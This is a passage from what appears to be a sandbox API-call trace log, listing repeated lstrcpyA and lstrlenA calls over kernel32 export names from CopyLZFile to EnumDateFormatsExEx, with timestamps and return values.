returned="CopyLZFile" [0078.344] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.344] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.344] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.344] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.344] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.344] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.344] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.344] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.345] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.345] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.345] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.345] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.345] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.345] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.345] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.345] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.345] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.345] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.345] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.345] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.345] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.345] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.345] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.345] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.345] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.345] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.346] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.346] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.346] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.346] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.346] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.346] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.346] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.346] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.346] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.346] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.346] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.346] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.346] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.346] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.346] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.346] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.346] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.346] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.346] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.347] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.347] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.347] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.347] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.347] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.347] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.347] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.347] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.347] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.347] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.347] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.347] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.347] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.347] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.347] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.347] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.347] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.347] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.348] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.348] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.348] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.348] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.348] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.348] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.348] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.348] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.348] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.348] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.348] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.348] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.348] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.348] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.348] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.348] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.348] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.348] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.348] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.349] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.349] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.349] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.349] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.349] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.349] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.349] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.349] lstrlenA (lpString="DELETEATOM") returned 10 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.349] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.349] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.349] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.349] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.349] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.349] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.349] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.349] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.349] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.349] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.349] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.350] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.350] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.350] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.350] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.350] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.350] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.350] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.350] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.350] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.350] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.350] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.350] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.350] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.350] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.350] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.350] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.350] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.350] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.350] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.350] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.351] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.351] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.351] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.351] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.351] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.351] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.351] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.351] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.351] lstrlenA 